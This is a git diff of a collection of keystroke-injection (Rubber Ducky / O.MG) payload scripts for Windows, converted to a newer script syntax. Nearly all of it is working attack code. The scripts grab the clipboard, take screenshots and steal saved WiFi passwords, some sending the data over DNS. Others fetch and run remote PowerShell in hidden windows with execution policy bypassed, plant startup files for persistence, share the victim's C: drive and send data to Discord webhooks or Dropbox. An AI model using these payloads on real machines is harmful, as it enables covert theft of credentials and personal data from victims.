||||||
|
|
||||||
REM Author: atomiczsec & I am Jakoby
|
Remember to replace the link with your pastebin shared link for the intended files to download
|
||||||
|
Also remember to put in your discord webhook in c.ps1
|
||||||
|
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
|
DEFINE #URL PASTEBIN LINK FOR BAT
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI
|
|
||||||
DELAY
|
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your pastebin shared link for the intended files to download
|
GUI r
|
||||||
REM Also remember to put in your discord webhook in c.ps1
|
DELAY 100
|
||||||
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
|
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URL).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URL).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
|
@ -1,101 +1,78 @@
|
||||||
REM --------------------------------------------------------------------
|
REM_BLOCK
|
||||||
REM Title: O.MG Plug Basic Local Exfiltrator
|
--------------------------------------------------------------------
|
||||||
REM Description: Exfiltrates via O.MG WebSocket API
|
Title: O.MG Plug Basic Local Exfiltrator
|
||||||
REM Author: thisismyrobot
|
Description: Exfiltrates via O.MG WebSocket API
|
||||||
REM Target: Windows 10 (PowerShell)
|
Author: thisismyrobot
|
||||||
REM Version: 1.0
|
Target: Windows 10 (PowerShell)
|
||||||
REM Category: Exfiltration
|
Version: 1.0
|
||||||
REM
|
Category: Exfiltration
|
||||||
REM Local exfiltration for O.MG Plug Basic
|
|
||||||
REM
|
|
||||||
REM The Basic version of the Plug cannot do stuff like sharing a local
|
|
||||||
REM storage device (at least at the time of writing), so this code
|
|
||||||
REM does local exfil by connecting the target to the O.MG Plug's own
|
|
||||||
REM WiFi and using WebSockets to save data to a setting.
|
|
||||||
REM
|
|
||||||
REM This assumes a WiFi-enabled target of course.
|
|
||||||
REM
|
|
||||||
REM Retrieve the data by using the CTList custom command under Debug.
|
|
||||||
REM
|
|
||||||
REM Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
|
|
||||||
REM --------------------------------------------------------------------
|
|
||||||
|
|
||||||
|
Local exfiltration for O.MG Plug Basic
|
||||||
|
|
||||||
|
The Basic version of the Plug cannot do stuff like sharing a local
|
||||||
|
storage device (at least at the time of writing), so this code
|
||||||
|
does local exfil by connecting the target to the O.MG Plug's own
|
||||||
|
WiFi and using WebSockets to save data to a setting.
|
||||||
|
|
||||||
|
This assumes a WiFi-enabled target of course.
|
||||||
|
|
||||||
|
Retrieve the data by using the CTList custom command under Debug.
|
||||||
|
|
||||||
|
Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
|
||||||
|
--------------------------------------------------------------------
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #PASSWORD Secret password
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
DEFAULT_DELAY 500
|
DEFAULT_DELAY 500
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
STRINGLN powershell
|
||||||
STRING powershell
|
STRINGLN cd c:\temp
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
STRING cd c:\temp
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM -----------------------
|
REM -----------------------
|
||||||
REM Collect info to exfil.
|
REM Collect info to exfil.
|
||||||
REM -----------------------
|
REM -----------------------
|
||||||
|
|
||||||
STRING $e = "Secret password"
|
STRING $e = "#PASSWORD"
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM ----------------------------------
|
REM ----------------------------------
|
||||||
REM Connect to the O.MG AP.
|
REM Connect to the O.MG AP.
|
||||||
REM ----------------------------------
|
REM ----------------------------------
|
||||||
|
|
||||||
STRING echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
|
STRINGLN echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING netsh wlan add profile "profile.xml"
|
STRINGLN netsh wlan add profile "profile.xml"
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING netsh wlan connect name=O.MG
|
STRINGLN netsh wlan connect name=O.MG
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM --------------------------------
|
REM --------------------------------
|
||||||
REM Establish websocket connection.
|
REM Establish websocket connection.
|
||||||
REM --------------------------------
|
REM --------------------------------
|
||||||
|
|
||||||
STRING $ws = New-Object Net.WebSockets.ClientWebSocket
|
STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket
|
||||||
ENTER
|
STRINGLN $ct = New-Object Threading.CancellationToken($false)
|
||||||
|
STRINGLN $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
|
||||||
STRING $ct = New-Object Threading.CancellationToken($false)
|
STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted)
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING do { Sleep(0.1) } until ($connectTask.IsCompleted)
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM --------
|
REM --------
|
||||||
REM Upload.
|
REM Upload.
|
||||||
REM --------
|
REM --------
|
||||||
|
|
||||||
STRING $ct = New-Object Threading.CancellationToken($false)
|
STRINGLN $ct = New-Object Threading.CancellationToken($false)
|
||||||
ENTER
|
STRINGLN $command = "[custom]CTSet`tcaptured`t$e"
|
||||||
|
STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
|
||||||
STRING $command = "[custom]CTSet`tcaptured`t$e"
|
STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM ----------
|
REM ----------
|
||||||
REM Clean up.
|
REM Clean up.
|
||||||
REM ----------
|
REM ----------
|
||||||
|
|
||||||
STRING netsh wlan disconnect
|
STRINGLN netsh wlan disconnect
|
||||||
ENTER
|
STRINGLN netsh wlan delete profile name="O.MG"
|
||||||
|
STRINGLN del .\profile.xml
|
||||||
STRING netsh wlan delete profile name="O.MG"
|
STRINGLN exit
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING del .\profile.xml
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
|
@ -1,16 +1,17 @@
|
||||||
REM Title: Powershell-History
|
REM_BLOCK
|
||||||
|
Title: Powershell-History
|
||||||
REM Author: atomiczsec
|
Author: atomiczsec
|
||||||
|
Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
|
||||||
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
|
Target: Windows 10
|
||||||
|
|
||||||
REM Target: Windows 10
|
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
|
|
@ -1,16 +1,20 @@
|
||||||
REM Title: Printer-Recon
|
REM_BLOCK
|
||||||
|
Title: Printer-Recon
|
||||||
|
Author: atomiczsec
|
||||||
|
|
||||||
REM Author: atomiczsec
|
Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
|
||||||
|
|
||||||
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
|
Target: Windows 10
|
||||||
|
|
||||||
REM Target: Windows 10
|
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
|
|
@ -1,25 +1,20 @@
|
||||||
REM Title: Priv-Paths
|
REM_BLOCK
|
||||||
REM Author: atomiczsec
|
Title: Priv-Paths
|
||||||
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
|
Author: atomiczsec
|
||||||
REM Target: Windows 10
|
Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
|
||||||
|
Target: Windows 10
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #WEBHOOKURL YOUR-DISCORD-WEBHOOK
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
|
|
||||||
DELAY 3000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
STRINGLN cmd
|
||||||
STRING cmd
|
STRINGLN cd %HOMEPATH%
|
||||||
ENTER
|
STRINGLN wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
|
||||||
DELAY 500
|
STRINGLN curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" #WEBHOOKURL
|
||||||
STRING cd %HOMEPATH%
|
STRINGLN del p.txt
|
||||||
ENTER
|
STRINGLN exit
|
||||||
DELAY 1000
|
|
||||||
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
|
|
||||||
ENTER
|
|
||||||
DELAY 200
|
|
||||||
STRING del p.txt
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
|
@ -1,16 +1,18 @@
|
||||||
REM Title: Pwn-Drive
|
REM_BLOCK
|
||||||
|
Title: Pwn-Drive
|
||||||
REM Author: atomiczsec
|
Author: atomiczsec
|
||||||
|
Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
|
||||||
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
|
Target: Windows 10
|
||||||
|
|
||||||
REM Target: Windows 10
|
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl
|
|
@ -1,17 +1,22 @@
|
||||||
REM Title: Screen-Shock
|
REM_BLOCK
|
||||||
|
Title: Screen-Shock
|
||||||
|
Author: atomiczsec
|
||||||
|
|
||||||
REM Author: atomiczsec
|
Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
|
||||||
|
|
||||||
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
|
Target: Windows 10
|
||||||
|
|
||||||
REM Target: Windows 10
|
Remember to replace the link with your pastebin shared link for the intended files to download
|
||||||
|
Also remember to put in your discord webhook in c.ps1
|
||||||
|
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URLBAT PASTEBIN LINK FOR BAT
|
||||||
|
DEFINE #URLPS1 PASTEBIN LINK FOR PS1
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI
|
|
||||||
DELAY
|
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your pastebin shared link for the intended files to download
|
GUI r
|
||||||
REM Also remember to put in your discord webhook in c.ps1
|
DELAY 500
|
||||||
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
|
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URLPS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
|
|
@ -1,16 +1,21 @@
|
||||||
REM Title: Spotify-Spy
|
REM_BLOCK
|
||||||
|
Title: Spotify-Spy
|
||||||
|
|
||||||
REM Author: atomiczsec
|
Author: atomiczsec
|
||||||
|
|
||||||
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
|
Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
|
||||||
|
|
||||||
REM Target: Windows 10
|
Target: Windows 10
|
||||||
|
|
||||||
|
Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
|
|
@ -1,3 +1,4 @@
|
||||||
|
REM_BLOCK
|
||||||
# Title: DNS Exfiltrate WiFi names and preshared key
|
# Title: DNS Exfiltrate WiFi names and preshared key
|
||||||
# Description: Exfiltrates WiFi names and PSK using DNS
|
# Description: Exfiltrates WiFi names and PSK using DNS
|
||||||
# Author: Keld Norman / Twitter: @keld_norman
|
# Author: Keld Norman / Twitter: @keld_norman
|
||||||
|
@ -20,29 +21,17 @@
|
||||||
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
|
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
|
||||||
#
|
#
|
||||||
# TODO: This only works for WiFi names without space in the name.
|
# TODO: This only works for WiFi names without space in the name.
|
||||||
#
|
END_REM
|
||||||
|
|
||||||
DUCKY_LANG US
|
DUCKY_LANG US
|
||||||
REM Target: WINDOWS
|
DELAY 2000
|
||||||
REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS
|
DEFAULT_DELAY 500
|
||||||
DELAY 3000
|
|
||||||
CONTROL ESCAPE
|
CONTROL ESCAPE
|
||||||
DELAY 500
|
|
||||||
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
|
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
|
||||||
DELAY 500
|
|
||||||
CTRL-SHIFT ENTER
|
CTRL-SHIFT ENTER
|
||||||
DELAY 1000
|
|
||||||
ALT Y
|
ALT Y
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING @echo off
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING exit
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
STRINGLN @echo off
|
||||||
|
STRINGLN for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
|
||||||
|
STRINGLN exit
|
|
@ -1,3 +1,4 @@
|
||||||
|
REM_BLOCK
|
||||||
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
|
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
|
||||||
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
|
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
|
||||||
# Author: Keld Norman / Twitter: @keld_norman
|
# Author: Keld Norman / Twitter: @keld_norman
|
||||||
|
@ -18,57 +19,48 @@
|
||||||
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
|
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
|
||||||
4. The last line called $encoded will produce an output that is the powershell code in an encoded form
|
4. The last line called $encoded will produce an output that is the powershell code in an encoded form
|
||||||
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
|
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
|
||||||
|
END_REM
|
||||||
|
|
||||||
DUCKY_LANG US
|
DUCKY_LANG US
|
||||||
GUI R
|
DELAY 2000
|
||||||
DELAY 2
|
|
||||||
STRING cmd.exe
|
|
||||||
DELAY 1
|
|
||||||
ENTER
|
|
||||||
STRING powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
GUI r
|
||||||
# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC
|
DELAY 500
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
STRINGLN cmd.exe
|
||||||
|
DELAY 500
|
||||||
$scriptblock={
|
STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={
|
||||||
function enc{[CmdletBinding()][OutputType([string])]
|
STRINGLN function enc{[CmdletBinding()][OutputType([string])]
|
||||||
Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
|
STRINGLN Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
|
||||||
$sha=New-Object System.Security.Cryptography.SHA256Managed
|
STRINGLN $sha=New-Object System.Security.Cryptography.SHA256Managed
|
||||||
$aes=New-Object System.Security.Cryptography.AesManaged
|
STRINGLN $aes=New-Object System.Security.Cryptography.AesManaged
|
||||||
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
|
STRINGLN $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
|
||||||
$aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
|
STRINGLN $aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
|
||||||
$aes.BlockSize=128
|
STRINGLN $aes.BlockSize=128
|
||||||
$aes.KeySize=256
|
STRINGLN $aes.KeySize=256
|
||||||
$aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
|
STRINGLN $aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
|
||||||
$byt=[System.Text.Encoding]::UTF8.GetBytes($T)
|
STRINGLN $byt=[System.Text.Encoding]::UTF8.GetBytes($T)
|
||||||
$cry=$aes.CreateEncryptor()
|
STRINGLN $cry=$aes.CreateEncryptor()
|
||||||
$enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
|
STRINGLN $enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
|
||||||
$enc=$aes.IV+$enc
|
STRINGLN $enc=$aes.IV+$enc
|
||||||
$aes.Dispose()
|
STRINGLN $aes.Dispose()
|
||||||
$sha.Dispose()
|
STRINGLN $sha.Dispose()
|
||||||
$b64=[System.Convert]::ToBase64String($enc).ToCharArray()
|
STRINGLN $b64=[System.Convert]::ToBase64String($enc).ToCharArray()
|
||||||
foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
|
STRINGLN foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
|
||||||
return $hex
|
STRINGLN return $hex
|
||||||
}
|
STRINGLN }
|
||||||
function dns{
|
STRINGLN function dns{
|
||||||
$tik=Get-Date -UFormat "%j%H%M%S"
|
STRINGLN $tik=Get-Date -UFormat "%j%H%M%S"
|
||||||
$subchars=get-random -minimum 26 -maximum 50
|
STRINGLN $subchars=get-random -minimum 26 -maximum 50
|
||||||
[regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
|
STRINGLN [regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
|
||||||
start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
|
STRINGLN start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
|
||||||
}
|
STRINGLN }
|
||||||
function wifi {
|
STRINGLN function wifi {
|
||||||
$wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
|
STRINGLN $wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
|
||||||
$wifinames.trim()
|
STRINGLN $wifinames.trim()
|
||||||
}
|
STRINGLN }
|
||||||
$KEY="EncryptDataWithThisCode"
|
STRINGLN $KEY="EncryptDataWithThisCode"
|
||||||
$SUB=".i.yourdomain.com"
|
STRINGLN $SUB=".i.yourdomain.com"
|
||||||
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
|
STRINGLN wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
|
||||||
}
|
STRINGLN }
|
||||||
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
|
STRINGLN $encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
|
||||||
$encoded
|
STRINGLN $encoded
|
||||||
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
|
||||||
# END OF STORY
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
|
|
@ -1,223 +1,97 @@
|
||||||
REM Title: WiFi_Passwd_Grab
|
REM_BLOCK
|
||||||
REM Author: LulzAnarchyAnon
|
Title: WiFi_Passwd_Grab
|
||||||
REM Description: This is a Three stage payload that begins by navagating to Network
|
Author: LulzAnarchyAnon
|
||||||
REM Description: and Sharing Center. It then opens the wireless properties security
|
Description: This is a Three stage payload that begins by navagating to Network
|
||||||
REM Description: tab, and makes the Network security key visible finally taking a screenshot.
|
Description: and Sharing Center. It then opens the wireless properties security
|
||||||
REM Description: In the Second stage the screenshot is saved to the Downloads folder.
|
Description: tab, and makes the Network security key visible finally taking a screenshot.
|
||||||
REM Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
|
Description: In the Second stage the screenshot is saved to the Downloads folder.
|
||||||
REM Target: Windows 10 PowerShell
|
Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
|
||||||
REM Props: Darren Kitchen and I am Jakoby
|
Target: Windows 10 PowerShell
|
||||||
REM Version: 1.0
|
Props: Darren Kitchen and I am Jakoby
|
||||||
REM Category: Exfiltration
|
Version: 1.0
|
||||||
|
Category: Exfiltration
|
||||||
|
|
||||||
REM This payload may need minor adjustments to run properly depending on
|
This payload may need minor adjustments to run properly depending on
|
||||||
REM Attacker, and Target devices.
|
Attacker, and Target devices.
|
||||||
|
|
||||||
REM Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
||||||
|
|
||||||
REM THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
|
THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 1000
|
||||||
|
|
||||||
REM Stage 1
|
REM Stage 1
|
||||||
|
|
||||||
